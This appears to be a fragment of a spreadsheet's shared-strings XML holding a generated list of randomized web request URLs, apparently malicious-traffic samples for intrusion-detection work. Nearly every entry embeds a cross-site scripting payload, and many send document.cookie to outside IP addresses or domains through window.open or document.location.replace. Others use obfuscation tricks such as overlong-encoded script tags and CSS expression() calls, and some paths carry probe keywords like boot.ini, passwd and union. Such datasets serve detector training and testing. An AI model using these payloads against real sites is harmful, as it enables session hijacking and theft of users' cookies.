    <t>/vd__rizbt8/uektqjreoapasnroekpi/achrren1un96yratte/hw/r8et/vqmuxnm22/hacz9ffzl8vfb@bcvtz/4ppassthrub0wqassyg-/6bl/zg/ggip45vsx/ohqzmmw4ccztcr.tiff?aer6u6=oovea&amp;f1rrnh2rsctmir=an&amp;hsiooifttciet4e=te-ri+lo8rhbt;lln&amp;ov1plshooq=3&amp;odne=p1cdc3_g@&amp;ant=m@h8t]&amp;@cwm6w0n-s=&lt;style++&gt;&lt;!--&lt;/style&gt;&lt;script+&gt;[alert++++('r2he');]//--&gt;&lt;/script+&gt;&amp;ofnesoqoen4r=9ud6&amp;mzrt6on=&lt;gttwssoconnect&amp;t9e6lbdat=adpq&amp;attaeidcirse=0138554732&amp;beftkes0snhtwc1=04541567</t>
  </si>
  <si>
    <t>/trija/e0q.bhe@ow9t/f0l0etab31etezmcisa/iosegcn9trdot.pl?ipaeesshiunlxx=oom&amp;5u.tmp78==+9aedea1ws&amp;yn8tbemnra=tn'(s0&amp;fna_b@a_zzpositionc=5tewetirtrsea&amp;f0yx2.lqlk=laoqex&amp;to-echo=09660&amp;rtef2ti5=&lt;div+++onmouseover+=++++"++++[window.open('http://139.64.102.238/elns.jsp'+document.cookie);]+"+++&gt;&amp;tdjug=bsnitegmochaeg1luu&amp;tit4ldltwehr7=mvntelocationebo2pr&amp;io7chnon=o(o6&amp;oewpry8i4ge6l=n&gt;rincludeer6mr(nnae0nt&amp;kesaottteaae=e&gt;+t|hlpxm&lt;l&amp;nssejlzn=+eopenm+e&amp;jcd6dsesetrws=931</t>
  </si>
  <si>
    <t>/zurd70a5x/tifug/hzpneirsiialmlttyiso/li6idjmv_ehhi0hsre-/nunbi.nsf?ckeem9cowr=ccmdmotswiedxe&amp;rob8innwemhltdi=eia&amp;se_abgsoundml6=&lt;meta+++http-equiv+++=++"+++++refresh"++++content++=+"++0;url=javascript:++++[alert++++('d52saroco');]"+++&gt;&amp;v@jrm1hhtpass=y$winntqe&amp;xlb1ltsndr=61146&amp;rcqallsa=5836&amp;es5fahdtoednfhi=756&amp;sdd=tpd&amp;rx0gu79=e7(idwindow.open&amp;hejitcl4=tnes&amp;wea9d=ledu@t&amp;0ianaoh=oiofhuemtrop&amp;panooenbl4al=33870&amp;elratsha5cjri=1]edybr</t>
  </si>
  <si>
    <t>/whttpshgwx5eellvvld/yg6ushtts/txvi0mrzjmvvhv3sb/teslktnnfome9r1rhh/buinputb46@boj6n/hvh/lrtxe9ihasgodi/cc/yotaadpwfnz/he.tiff?unt1iloekth=3686&amp;pasapncrpd=tqxut29qu1.w&amp;aaulbijuni=kegorb\\os++gtnseur&amp;ohaiai=&lt;div+style=+"++width:++++expression([document.location.replace('http://www.icge.com/cgi-bin/ni.cgi'+document.cookie);]);++++"++&gt;&amp;idthin88dhrtdf=82628981&amp;5oqqy6k=ro=+vnqe88er&lt;xp_o&amp;eib5neso=g1wvbiijz7&amp;ihaving6pxukj=kutsr&amp;ok9et=stdeeee4twt&amp;lbietaxetf=dq2ad&amp;openmk6r-punion=743026&amp;irecrbd=426948&amp;nmanm3s3snstnwc=3nueg</t>
  </si>
  <si>
    <t>/ps/ersvxzd/nsh0fg/mq8kp0j/ousfzzxisbmp/anikuezprb/eosw8smaiac/w4i@oszlo.tiff?uyl4n996_m8=otmprae+~oafscfr+leme&amp;xlti=102666&amp;1aa0mndfrlhhop=jt7fayhttp&amp;pj=9905&amp;1iaold=057082&amp;tescufnn=:&amp;eh=javascript:++alert++++(++"+++oa3jda.t9")&amp;ramejrocg=4sc2aaila&amp;0d4coeqhofalter=1&amp;i6uv6f1hklib3=5-hvclza3i1&amp;tpqtsbng=tyne7oarnrtu&amp;aiaoe7mpr=8oz1imk7j066&amp;miet@cbaj=steeitoab&amp;ok=opr&amp;ramgeetpn9=99748612</t>
  </si>
  <si>
    <t>/r98bzs@mzfbfygr.php3?ab43oungdm=93m&amp;p5b09cb@p0k=8188154&amp;ete=6&amp;erersno5b5mc2e=i3emcimochax"whereh\\"aersae+&amp;ytswfeecdke=50&amp;9dachfhejrue=71189463&amp;ctdec6pexetfz=&lt;img+src=&amp;{[document.location.replace('http://www.reisma.com/cgi-bin/vendanrans.cgi'+document.cookie);]};&gt;&amp;trn35lirenriii=ntsfquhfa7naneu</t>
  </si>
  <si>
    <t>/a@_vwjxpdf5pl16@-cl/n8c/1eaucibri.aspx?nctnasujtluqk=tqledoapyheea&amp;itc=srxe1m3aeb&amp;le=ypbobntfnrid8dwlef&amp;disasswx=hr7&amp;si=&lt;div+onmouseover++++="++++[alert++++('usr5oyteni');]+++"+&gt;&amp;9orlje8rh=9&amp;lsval3sbdmj=466&amp;i0gndji6lkk=iitaarszaedentaqyu&amp;ocnea=tvein&amp;upjnnnari=696237&amp;lhoahmuutep=godltacnon</t>
  </si>
  <si>
    <t>/ri1bz/mimg4dfrid7zq59x/im-qok/ognviukruhha/svfx5voygzeehwl74k55/w7q6dyw/tu1qqlx7o/n8gb-/deletehfozvnodey/nhfixsdmdeem8pnn.asmx?3gc4jiepo=tetioatt70imnl&amp;parlue=iyy%fw&amp;8ro=&lt;link++++rel+=+++"stylesheet+"+++++href++=++++"+++++javascript:++[window.open('http://137.8.172.194/ndniat.nsf'+document.cookie);]++++++"+&gt;&amp;nngbto=4t&amp;ntrhg1=436712&amp;pneeetloseelo=332540276&amp;eouoi=nixfc</t>
  </si>
  <si>
    <t>/eqp3q.pxct@dre7kqx6/silogj9sgfld/r@w/efnw5txmfwhpk_i/ua/sfbl2/a9pscklhbunqperla@x/oemua66qqomihe/dzzdfkfpmayht/3vthcunxo/natkz0-vpofw.q6cklwy/szlus5oj2ffgw.js?ggooreorrc88ng=80214&amp;tb=&lt;&lt;script&gt;[window.open('http://150.150.71.58/ns.dll'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/oloyuatnmyeheatome/l6ik/r1mg6pxghl_mv4we3/nlqlbtu@btpnm/ieje_kk/sy1xtu-j6kp/widltdioaaates.html?uvvuznu1ikq2=yvnstor8iu&amp;eoft15teie=+ctehnruzdf=a3execboot.ini&amp;zc=yexeis0osbl&amp;1yepdqfd0a=2&amp;hleoio=&amp;&lt;script+++&gt;[alert++('enr');]&lt;/script&gt;&amp;edooi=trloesjltlit&amp;b.ny_vbscriptptmpm1=ot&amp;vneatn=riliaaqez&amp;ol0semshlpju6e=+sndrb&amp;xudesofidtt=32240&amp;nrgdzpo2=073</t>
  </si>
  <si>
    <t>/kjjaacr8/not.pvpypq/aocdjqrmunub/8bmochazz@6gbetweenaccess_log-sc/arbutv/ewtwfwov2o/syi8by/enigyrohpoc/im3mb/j-jyog.jsp?rbaaaa3nslndqit=7bo2trboot.ini&amp;sbteis=352&amp;esepno=tsbmeta&amp;kdzb06xqsam=6420&amp;o8lmtliheaha=[\\xc0][\\xbc]script+++&gt;[window.open('http://86.179.91.208/onti.pl'+document.cookie);][\\xc0][\\xbc]/script++&gt;&amp;tsz4=lsrbtffx8irg</t>
  </si>
  <si>
    <t>/xnruexjr6jqlj0z/xoi/ubns2/umetakaccess_logtgd1ggdft/gotigehnumer2ssod/pk4viq9mcqdmwqh11r/efsock_stream937bgsoundu/d9a/ottsgihgawze5pp/swbr7bhvf9_tlgpfhsaz.cfm?gud9oqrin0=xuo&amp;yltmw=shcxatk&amp;mpesrarrmo=eeep&amp;inasetb=qa2&amp;lecaf=3npas=moerhe99+&amp;epeadertn=2808754&amp;btoc=aunynrilzach&amp;dnthu3dygt=&lt;img+src=&amp;{[document.location.replace++++('http://www.mach.com/cgi-bin/tegedeleor.cgi'+document.cookie);]};+++&gt;&amp;peg3o5=sflorettseqar8g&amp;7f8ioemahunena=r5ypmubcyzq&amp;emxe311eecy=itw&amp;nh9isnskh=719&amp;ei6eo=iuoisb&amp;e3rcf=19&amp;oero86yreuleqr=ettswce2nqperls</t>
  </si>
  <si>
    <t>/cco5/r8a-y_jmagv.shtml?oiatbdl2o=eyso91arreey2c&amp;l3rrsnqtuvrru=allivoptaneeoti+8ttsal&amp;of8wkse0osteh=&lt;div+style=++++"++binding:+++url([http://www.an.com/script/kex.asp]);"&gt;&amp;cleqjrj5tbddsn=85181&amp;nitefo=dn&amp;nqsithpmathslt=84961687&amp;3gtshutdownps=ppt0sr0edrdmlaed&amp;nko=terdi</t>
  </si>
  <si>
    <t>/8d/5aull/htpassjd/ct/tjaospbexrprdpdy5ypn/eoco/0zosnzo_yty2enwouml7/cbbmu8n/e7aqttoep.asmx?rgoa=&lt;div++++style+=+++"+++++width:++expression([window.open('http://15.15.113.106/orme.msf'+document.cookie);]);+++++"+++&gt;</t>
  </si>
  <si>
    <t>/nhd1hwts5nn/nrzcfsnd/areeeemaqdntosthmtfp/tk85/e23z7g93m4qkzbb/eaa6s0h/rnirnse3roa.js?mtlrrne=mcseteh3ec&amp;0rrfetenisjrs=or&amp;aioae66eiwcxui=+bosfdfta&amp;petjrme1mtano=c$i[&amp;cm6wgethiia=hecho5m&amp;rthiemotite=&lt;img++dynsrc=+++"+++++javascript:++++[alert++++('tmd');]++"+&gt;&amp;lplinkuoem=ftp=u&amp;eahtdapmsamo7o=953965&amp;wc8sahp=1&amp;ymwlu=8&amp;xxtermzinput9=or9uhu&amp;ts7re=43&amp;ul=ropai8czh49oahle&amp;obdtnuadu60rg=79&amp;isro=rmuq6h</t>
  </si>
  <si>
    <t>/ter/aettebjattdhfr/inh/tel0d/ickoceds/lqkc/itkqyun@_k7h/dedfslifgwn1s1nb/bfcfacanfbfla/g@c9jjo/hcaceatsdldrtbu/pdihal.dll?hsoaee=&lt;&lt;script++++&gt;[window.open('http://123.143.175.36/ndnale.sh'+document.cookie);]&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/eys/deesh/txjr@q1flpx4_qmwp/yr3csitlohsjtt.shtml?7ltntea6nethhn=rdizcsidawj9&amp;enntinbdad=eetaiwaetz4wnse&amp;niboh=zvueefsrt8lwarfcfe&amp;rtindgtel3enl=s-9/h&amp;tyarftnrn5eeh=w1bs7@py0f&amp;boy8k_df=i8t.ztnjx&amp;nwnngxatwtwnwa=&gt;?&amp;esaitswehakyvep=misabodh&amp;sg=420243423&amp;eyyiat=aw6fjx&amp;gebamgcr=e&amp;f)qb2zwunion&amp;t1haacdetdeu=&lt;script++&gt;alert++++(wai3cinajynoe3s.mfrim)&lt;/script&gt;&amp;ibo=ismqt&amp;lieen9=nntlaffq-1&amp;radtsi=62</t>
  </si>
  <si>
    <t>/itrc/xp6y89uq/inputh1sconnect/8x0aj60d.91mloi1/n2yul2e1fak9_gdtqu/htspae4ysikadmrdsn/isxigueelwn_/d9ha0s5tchoi9rni/eqbqm/ykceokwaeldmbwito/essongsl8qnl_.php3?osjwlsant=&lt;img+++++src+++=+++"livescript:[alert('itds8yz94p');]++++"++++&gt;&amp;nttebnfc=o?&gt;rmc</t>
  </si>
  <si>
    <t>/eaythnv95d_1leic52b/etcrrjeinl-@f0erl/a.9t__q/culxzrp64moprnfo9/bxterm4wx2vhqakarlj/erlrjalgykuccod/rszfntgkj@8svx.mnwi_.php4?70aa1zx=45128&amp;aryosry6ehsqsq=ys+t&amp;s3ehup9uiins0i=8912&amp;ciyoorra=ffeusigeives&amp;v-bc=6&amp;xh3kfifsp=ndg7fftfae&amp;td=hckcm.q&amp;niaayb9koas=1&amp;zxmlopsgo=lwdfe26tntegdetcdiv&amp;sregh6oyuco8=42496&amp;r7eh_s9grju=&lt;img+++++dynsrc+=+++"++javascript:[document.location.replace+++('http://www.atle.com/cgi-bin/onenrallit.cgi'+document.cookie);]+"+&gt;&amp;7icbmpasswdvomqb=sk-yk&amp;pi49phdonnw3lar=ylhturmoeoyriyh136a(&amp;ohgwrp0yl7ergdn=mmethosin2s&amp;mpoealrsoaee=oenrz</t>
  </si>
  <si>
    <t>/iesm4ffotcdgo1esanv/wfmvq5yi/uxqkaoaig/ntiaslbeohi6ria/eriomuahtv/e1n0urbq.60zy9mnou/tutaf4cm5kp_mzc/ti7otucwnl./yzmbsm/nuhpin1loetonfnnswy/aikc_dzq63n/skpwtcoe9@wnggggjstz.tiff?icwu=oo(ac&amp;qjaaetnhe=nideayr&amp;lmai=112&amp;todb=&lt;iframe++++src++=+"+++vbscript:[alert+++('eqoq8lssil');]+++++"++++&gt;&amp;tpcnrrsao=zniiemdndtmsit&amp;7bodyp76l3=vuhtra0tf-ojv~neeeha&amp;jpsbi6nteshebg=lp5h&amp;rtnedn=u</t>
  </si>
  <si>
    <t>/a8ktstntenas/npheg41z-p9hqxp/ehbxdrpid7/nih/dhtoxx82lzaaard/ivt1aebmpw8snr/ans/pnece2uertm/s84eboatrknsceahsu.exe?eg6b=352&amp;ktao7rr=ks0csunleogeene&amp;uppwyt0deaaeius=l%b&amp;wmacceptws0cmw9r=&lt;img+++src++="++++mocha:[document.location.replace++++('http://www.ge.com/cgi-bin/ntelch.cgi'+document.cookie);]"+++&gt;&amp;obnelwe=f8v7upzs&amp;sbwirgs32o9hdi=/xterm~xc</t>
  </si>
  <si>
    <t>/vrn/ewnoi2uii0kh8/nig8wqq.y8qga7yzubte/nl/utceamd9ms9acenust/seutdtsehlru7ko9/ysa/laccess_loghxewwinntbfpasswdgr/zhk5ohn7s/in_rzhzu.html?e6dy2o=3dm@pn&amp;lhee7otusrfayde=6236762&amp;ejssrned=exechw&amp;iurterfo=wg&amp;pdancitl=ag&gt;aln$&amp;slhei=he6b2p3zu1pc&amp;lteci63hijx3=10837&amp;6g=&lt;style++++type++++=+"text/javascript+"++&gt;[document.location.replace('http://www.ratrge.com/cgi-bin/enro.cgi'+document.cookie);]&lt;/style+++&gt;&amp;xt97update5=0043890&amp;nztrlless=95000</t>
  </si>
  <si>
    <t>/o.zsbnvj4aych4ljlg/aewvepfhcoi5na/flnapte7haope/dyxax8g1ycczh5qk_/ixl6isosd/igwtvgnp/oubh9z8bedpu1/nba2d/7sqprqertnimsydyt2n/i36r-3/airnntabqe/sifjdkotre.msf?s0otsratonb=nt7&amp;haoerwncosai=tni(&amp;mrepwtrff=bsvxn3t.tic&amp;uhlbgsound0=sz1&amp;pwinntqv@=+hdheiframestyle=ohzq&amp;6i4seoetctc=&lt;div+++style=+"+++++binding:+++url([http://www.elor.com/script/tmt4r.cgi]);+++++"++++&gt;&amp;dar26ssfotfsear=adcjrrenmnzfmeori&amp;osyepc=ho3ntaztnea4aston&amp;phlerrclw54hsi=epttte4</t>
  </si>
  <si>
    <t>/z2wxf/sez/wizdhh/hraopotgps2rra/esmeb4e/_u6otpasswdkwtmpdocument.aspx?xzzme=448&amp;resaklot=laaio+style=left:expression(alert++(otr.rnei))</t>
  </si>
  <si>
    <t>/3alvpnlca9gfzukj4b6.php4?nwr5j=6573&amp;lhasr0jtnees=&lt;img++src=++"++++livescript:[window.open('http://60.213.98.140/maesst.exe'+document.cookie);]+++"&gt;&amp;ergreqx=603947&amp;wi2itnxsfakrce=5&amp;lb6kidatie=y(evalse&amp;rjbbajprocessing-instructionxp_boot.inihtaccesu=sritppebewtcl&amp;kt4omsm=754305&amp;enbtsoes=06019&amp;lm=058557540&amp;s3s=ea/</t>
  </si>
  <si>
    <t>/efrv2jy0r5g/echok6m@j/oseywspnfeeoleeeoauy/trtaed1a0ocwth.png?ihout6h=pvp&amp;omlirhit7vgn=44&amp;rl2aiingowu=a0do=necho7&gt;mochadgl+ness+&amp;mee1orsnlzet=eo&amp;ser9trt5apmkna=ihbztjh0&amp;tte=&amp;&lt;script&gt;[window.open('http://122.77.27.114/orasit.asp'+document.cookie);]&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/pj/jsq1gb6oldlxjwe/zaiqu-vdxs/dta9senafl2d/div2yb8pzq059lph/i3p.cgi?ntaoq3wsn=&lt;bgsound++++src+="++javascript:+[document.location.replace++('http://www.nete.com/cgi-bin/ng.cgi'+document.cookie);]++"++&gt;&amp;eniut9=4656847&amp;ssxetalthxale=1567388&amp;bmtahutmr2od=&lt;uqhl&amp;hrhdsltht=3e31ndt4edtmadma&amp;ti7ibendt=foc)eogroup+byopenvpdropiiola&amp;petc0eabyye=489168&amp;eene6y=+rl&amp;4odwan3otstatcn=osnneiasy</t>
  </si>
  <si>
    <t>/polyiefn/2uknvrstpqmp/3l8_gz9x/u9lavobvw0/ay8sv7j5-bxqbfgtweq/n8oh/merte3eohe.jpeg?neeaemnt=like+u&amp;ctiaueqr=rastztlsek1d&amp;tessgc9wu=garrsvuucodse&amp;xdartveoep=&lt;style+&gt;&lt;!--&lt;/style++&gt;&lt;script&gt;[window.open('http://214.40.221.80/andeti.msf'+document.cookie);]//--&gt;&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/rbvul1ts2d_nx6f/ge5gmj/6ahiooirthhcoao/m4kloe8why/pye.yexecsupjcmd/bsgbeafopenebhlad/a@leminput9f.jvkqint.nsf?eaiectseyd9tt=58&amp;lpastwtsdxc=d0s1xicuzed9&amp;gtrnbxrrestoo=1rl8c_ced&amp;ehuoacea=91&amp;ketmmaem=838&amp;us1lmhmu=&amp;{[alert('rdkt');]};</t>
  </si>
  <si>
    <t>/7cehlsq/n13g/nr2scriptf/ev02e/uym4uertkc/ek2zuoehmras/yql7h@kxmdtfcbuc.css?ranq8a=ihfgvdsexo&amp;lsstaeso3ro5=hitn&amp;iso4eh=xml;+rmailnhtaccesifopt&amp;yrutu2o=82347&amp;llhtcoit9=43330&amp;he=et5pef&amp;doireplaceqbl7@kpu=nttn+pa&amp;ixig@cmdwqq2ta=2&amp;ttabe9zuei=ttcrp+accept&amp;iac&amp;snosn=&amp;eoyh+o&amp;cmyia9no=&lt;img+++src++++=++++"+++elitilic+&gt;+++"+++++onmouseover++++=++++"+++[alert++++('h6zerr1e');]++++"++&gt;&amp;en=nheeanorent&amp;o5ketso=enetcattst7ahmailbpshutdownas&amp;bwtcrezddoeje5=raptdesc&amp;vu3zurkw=b9</t>
  </si>
  <si>
    <t>/i-kb8jem-5zp/eesna7ebnzemodi/chestutndtmnght0/i2b.jpeg?sx8aohcb=tih(&amp;uoeeoi=ofmonwuueot4ih&amp;oeoeis6ukiyfpyn=&lt;img+src="++en+++"onmouseover+="+++[window.open('http://186.200.202.234/anatar.asp'+document.cookie);]+++"+++&gt;&amp;seainyhateae=n&amp;ne9ohriiwh=fhtdeo&amp;sn=9ap6sosh</t>
  </si>
  <si>
    <t>/g2c5aiw/i9y67/itidl/f8gy-stgq@e5.jpg?tel3iwuc=792&amp;hcuee=gceetiv&amp;cats=nile&amp;sock_stream.vqrazonr=17906&amp;9q0czi=716864616&amp;d40gseho=82&amp;nv=o4nyn~wget&amp;hmazrmnroite3a=systemwinntlinkr&amp;treplacevvfe72form=hir2&amp;clstrwh=04&amp;ttsodroeuteff=4298&amp;l2tiov9ae9nwtv=&lt;link++rel+++="++stylesheet++++++"+href+=+"+++++javascript:[window.open('http://126.21.32.6/nsorre.jsp'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/itpvkfaudefwm/sl0uae9sdtwnleer2mhm/laxb/mn/hn/h5imteiv6ett1ndpr1a.msf?iife2daua0ohym=rusn++onload=javascript:+++alert++(tcaza2te.1e)</t>
  </si>
  <si>
    <t>/bmebvcegtjrtlmtcb/ngoasiiatbmbaar/dx1hwinnt/hacenwer/e0q.jpeg?iavapes69=60542876&amp;1hoatl5unene=i2rogrk&amp;if5j8ettuapn=ax1go@&amp;tgaes2nsnzhchr=388&amp;nanxe3=zt3vs0+dictbtec&amp;exhai=oj2&amp;shz-ke=nhddhdsheysv3oe&amp;vhoreishoon=&lt;input+type+=++"++image"++dynsrc+++=+"+++++javascript:++[alert++++('hy');]+++++"++&gt;</t>
  </si>
  <si>
    <t>/wh0xiir/ne4owu.swf?seonattbwt=&lt;img++++src=+++"++arerstllor+"onmouseover++++=+"++++[document.location.replace('http://www.ve.com/cgi-bin/eralsi.cgi'+document.cookie);]++"+&gt;&amp;li55eardcstn=88&amp;dtebwatdsd6r=4qn&amp;ztutmcbscn=4dc=nc9dr3et0&amp;8azservices4enban=mailaeselectoliiantt8chn4dn7&amp;esey6=ko5rnea&amp;ets3rp=ators&amp;toa=lgincludef&amp;eoba=eclu+tvpg&amp;etueeth=24246935&amp;e8t='in+o2xiimgemael1;ti&amp;esoyxta67efireh=odnd&amp;useysjt=3ha5cmtd4h</t>
  </si>
  <si>
    <t>/8aelexecmetae/djvvfacj/itx-itvies8.4/x.6jmkz.21a7.a2uumt/ss/oo2uwaa2u3dayarqz/ima8m9qc9cwr/eqbunu4atio94.tiff?aoiee7the=799&amp;neoy8i5iw=&lt;meta++http-equiv+++="+refresh+"+++++content++="+++0;url=javascript:++[window.open('http://189.252.58.189/erst.mspx'+document.cookie);]"+++&gt;&amp;67thxlip=+ih&amp;iih=k@ao&amp;csa4ykr=objecta+3e7id+oo+email</t>
  </si>
  <si>
    <t>/xfckeg_v9gw/taccepts/t1n9kqp.zr8jqco7@/h6vol_i3b4/eg.dll?xwfqfpositionxbnay=ruvo+5+toast&amp;rohyf=&lt;object++++classid+++=+"++clsid:..."++++codebase=+"+++javascript:+[alert+('inemtteaz');]++++"&gt;&amp;raaeafps=51539054&amp;bcbhttpstelnetx=ej6lfb&amp;fvzsmenqfduhel=533196073&amp;tczobject@odocumentltmp8sp=ebxth@xtsy&amp;aechildzz=titc'&amp;eamzhab=79231547&amp;bqnbebtth2qpi=9a</t>
  </si>
  <si>
    <t>/reviocdk/dihbe0cdbf9szm84silt/_wr9tj3fctelnet/mioyefitaolernge5as/andxy/ej-an3r_.php?sid=o22-jigcbnt&amp;idnitneliydsw=eioaopsn&amp;ttpsjturh=&lt;a+++++href++++=++"++++about:&lt;s&amp;#99;ript++++&gt;[document.location.replace++++('http://www.menill.com/cgi-bin/nsndal.cgi'+document.cookie);]&lt;/script+&gt;+"+&gt;&amp;9d7_3wexec=dvi2kotn&amp;inshariofc8eaa=tomk9pats0&amp;uyag9rfj=bd&amp;fbsohib=\\0&amp;rtb?&amp;cbb=9716&amp;enhpozut=ietv&amp;open.landvz6lzu=ttf7oj&amp;eotwteze=usrlehris&amp;eot=0&amp;ntnt3oo=ek8se</t>
  </si>
  <si>
    <t>/nom/n_x_aponsrd_/eznulidm/xi7/b0sdvmn/nj.grss1aabp/ior/saat3qstsaptbcnsr/o5mee.tiff?8nfqtsfoa=uniono3telnetiieobject&amp;uwp-sjlv3trx=8392741108&amp;otetth=r&amp;hdeoinnj=ax&amp;omlynoeoe=lm-perl&amp;f1mbb5t=edvzvyu&amp;z0-hl=&amp;{[document.location.replace+('http://www.alme.com/cgi-bin/trleti.cgi'+document.cookie);]};&amp;re=poio3tsuce&amp;apunsy1i=eoehs&amp;amvnf6m=dihkvt4et3ied&amp;unerf=pu3r0aegdwc&amp;arei=nmoa24rduwawvydth&amp;pbfnnimicnjlo=62822</t>
  </si>
  <si>
    <t>/hhhnodemhtaccesan1x.html?alfa=fiieapimirx&amp;lgtn8=12981267&amp;ss=admin&amp;dqited6edys=235808&amp;lspestveceea=&amp;&lt;script+++&gt;[document.location.replace++('http://www.enalesri.com/cgi-bin/almeasas.cgi'+document.cookie);]&lt;/script++++&gt;&amp;dk@6bc=nnwakhserkalnfsd9&amp;jkke4tslfimg=exs4du_.&amp;ni9tmahensea=fpnagdropdivive+-u&lt;:&amp;hp&amp;aoo6oehune=+2hoacsddtndn&amp;ttetbslesidr=-r&amp;ti8hwokdma=l/aoch&amp;vbscript5winntbg=-aeyxsfh\\l9a&amp;owcci2m=7t-htiu&amp;by[n0include</t>
  </si>
  <si>
    <t>/ildraorvuhj5m/t5j_yij0@whezviryx3r/teue6hnatoote/8mhtv0yhcescedvntqnn/7s4dtjvw8eep/d0eaf/rqderiatiedjn.html?orulciaj6iua=&lt;div+++++style+=++++"binding:+url([http://www.as.com/script/9bn4.asmx]);+++++"&gt;</t>
  </si>
  <si>
    <t>/iie7x5@vb4@jgwg/serei1ilgydtnb/5bqgoj/ob1.exe?ree0=ttacobject&amp;0ucnq2ixoibl7v=uzh4epit&amp;n3oy=ioto&amp;1ievdjlhesyy=ceots7tamlizao&amp;oqz7cye79=5fw&amp;nn6tiooinhtne=&lt;div+style++="+background-image:++++url(javascript:+[window.open('http://131.59.254.217/eltoge.msf'+document.cookie);]);++"++&gt;&amp;te=32490&amp;amrqj=xrtk&amp;1+&amp;chleroi=hhntnielrcaiesr3ob</t>
  </si>
  <si>
    <t>/oonehatgsx/goakhna/ar_hidqw/a7q.pl?pcitcheretbdua=sf)gbtelnetxelwziuu&amp;npiamageioxsn=&lt;img++src++++=++++"+++++sechalat&gt;+++"+++++onmouseover=++"++[window.open('http://60.24.127.187/rase.php3'+document.cookie);]"+++&gt;&amp;6ca3gweo=yinemeldroprauhhjgo?n~l</t>
  </si>
  <si>
    <t>/hilcgunefa99t7ttl/enziseo/qm9vb73khbalbpu/sock_streamsr.aspx?pern4lorhdb7r=tmeetaligluqs5lrn&amp;thb5derd6=liooeot&amp;svedj=7var&amp;vr6yeyvossnaed=oiovm@a9&amp;domrcsdnn=406917&amp;woout9ln4in5s=&lt;body+onload++=++"++++[document.location.replace('http://www.nsla.com/cgi-bin/ises.cgi'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/cwxml_xxlbl4gkx/yi3lemdeta/iertoa29/e8dhelpoxlo3ub/g8.cgi?aqnf4u=0eetoeggnfd&amp;hzidewv_perl7enh=&lt;div+style+=++"+++behaviour:+++++url([http://www.aronto.com/script/nedidvload.aspx]);"++&gt;</t>
  </si>
  <si>
    <t>/eue6yoqlnxaow/b4zi9frcm/4nweadnq4kgi4dgdp/omj9s_9sd9i@gcj/5nejw.mdb?idoltuota=iet&amp;oheec4meejbsae=tqh3iqbf-0e&amp;nset=&lt;e4i&amp;9sd=6683590&amp;tcu=&amp;{[window.open('http://219.178.225.90/is.dll'+document.cookie);]};&amp;ehuideetunc7a=rol70woti&amp;i_.-yjyjhttpsdivd=ps4i&amp;htaedcposoie=3606&amp;nr=+eths4nriurw&amp;sgmbsopugfnoasf=7&amp;sdlgca=i9i&amp;72wspebz-g=464216670</t>
  </si>
  <si>
    <t>/ikdo-nd.p9ugh/e4snzlekbematz/doezti/ivb@94ppbvpk0v/efttc/9n/qmdrdtl.m0/ot6otfg9teaene/mqzh_i8b6/oiiaashs6hcwwtt8ew8/io8r.png?sqtestah=h++b1&amp;aganztsdnt9=ohztvar&amp;zlsectrrvqhlir=i;e2&amp;vo5unionfl=e&amp;oe8sfg=snohhcataprocessing-instructiont&amp;t6iqhceidbiv=hqfrj&amp;8zahomerzqj=+e&lt;\\audshutdown&lt;yaruraxnbetween&amp;mhb=&lt;input++++type=+"++++image++"+dynsrc+++="++++javascript:+[window.open('http://190.18.2.214/on.jsp'+document.cookie);]+++"+&gt;&amp;latncen4le=514883&amp;ertbetgsxbq=thi&amp;yh2=late&amp;ldedneepaoumr='t(tiframe+t~n&amp;eng11ay=czuuzmw</t>
  </si>
  <si>
    <t>/5eefttaeaetnhgi8s/mfpen5ehseaheh1eti/sr2ddo0me2h8/sjwznd5/arcrdyoirhg5eaz/m@nngbh@p/as/trmuttoeah9/4eeecflrcierte/th8.htm?envtdeeed7gcs3n=4&amp;ncrte=4305659064&amp;37i=&amp;{[window.open('http://1.229.103.28/chmeri.bin'+document.cookie);]};</t>
  </si>
  <si>
    <t>/2strhuio9utshnplfr/pxcp.x.bin?ct8f9ac=3148719458&amp;ia=rxfa.h6qwrf&amp;leefn=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script+++&gt;[window.open('http://114.144.42.53/nsasnt.bin'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;esslu=ct01dhwsense&amp;abetweenwcmbkmo=eecn1&amp;ghedetpsbr=8)s</t>
  </si>
  <si>
    <t>/e0niecafinr.gif?iudtssn=[\\xc0][\\xbc]script+++&gt;[document.location.replace('http://www.laisch.com/cgi-bin/icasnira.cgi'+document.cookie);][\\xc0][\\xbc]/script++++&gt;&amp;dkx..lln=shn1r9oquotfnseeo&amp;kn=xati&amp;mhset1lseiptt3=0ahtpassieetalst&gt;e)zq&amp;jc=tp&amp;enraeesjaihr7lp=n82uoy3mfyzp&amp;tbeoysoimt=l7&amp;7mvor=coleorr(+t:e</t>
  </si>
  <si>
    <t>/thsf3/n@@i/iframea_.php3?tai9e=84&amp;v9k@eib=6&amp;eplsnueuymbos=hr%ivart3s&amp;ll4ktioitoqrsii=02&amp;ryeshtfne5tioe=&lt;div++style="++behaviour:+++url([http://www.atalasit.com/script/rmt.sh]);+++"&gt;&amp;htiademhgasn=148199610&amp;fl=64276&amp;tirur=362114006</t>
  </si>
  <si>
    <t>/2vkaxbunion9ya/tkf7wxxjx@_4qyf9_g4/rnt/rqm6lgh/uexecsock_streamp0pwalle_mq/86cmqkh9/pvpgrsincr_hhtnisoq/otmclbtcr.jsp?4kbinsxla=aeqgoqeucei5el&amp;soc7l4=6t~m&amp;tfinuhmlia=aand@woe&amp;2sdnjsu=g9csei]hw1a3tom&amp;wa=2326130899&amp;oeewscsdha6eo=tal+$emzor&amp;yttdmt=ofre&amp;4npmecas=2?ml%q+non7&lt;+object+nb&amp;iaode=085308182&amp;2tc=oayfsf4knb&amp;bos=9&amp;zrdooqggpsthomercp=&lt;img+src=+++"+ntnadetast+"onmouseover+=++"+++++[document.location.replace('http://www.vematrit.com/cgi-bin/meiltege.cgi'+document.cookie);]++++"++&gt;&amp;udotcgpdlxtls=vbscriptfs+q+eonchg&lt;&amp;a5oepalt11gjwi=brswse@rev&amp;3trcpei+slk</t>
  </si>
  <si>
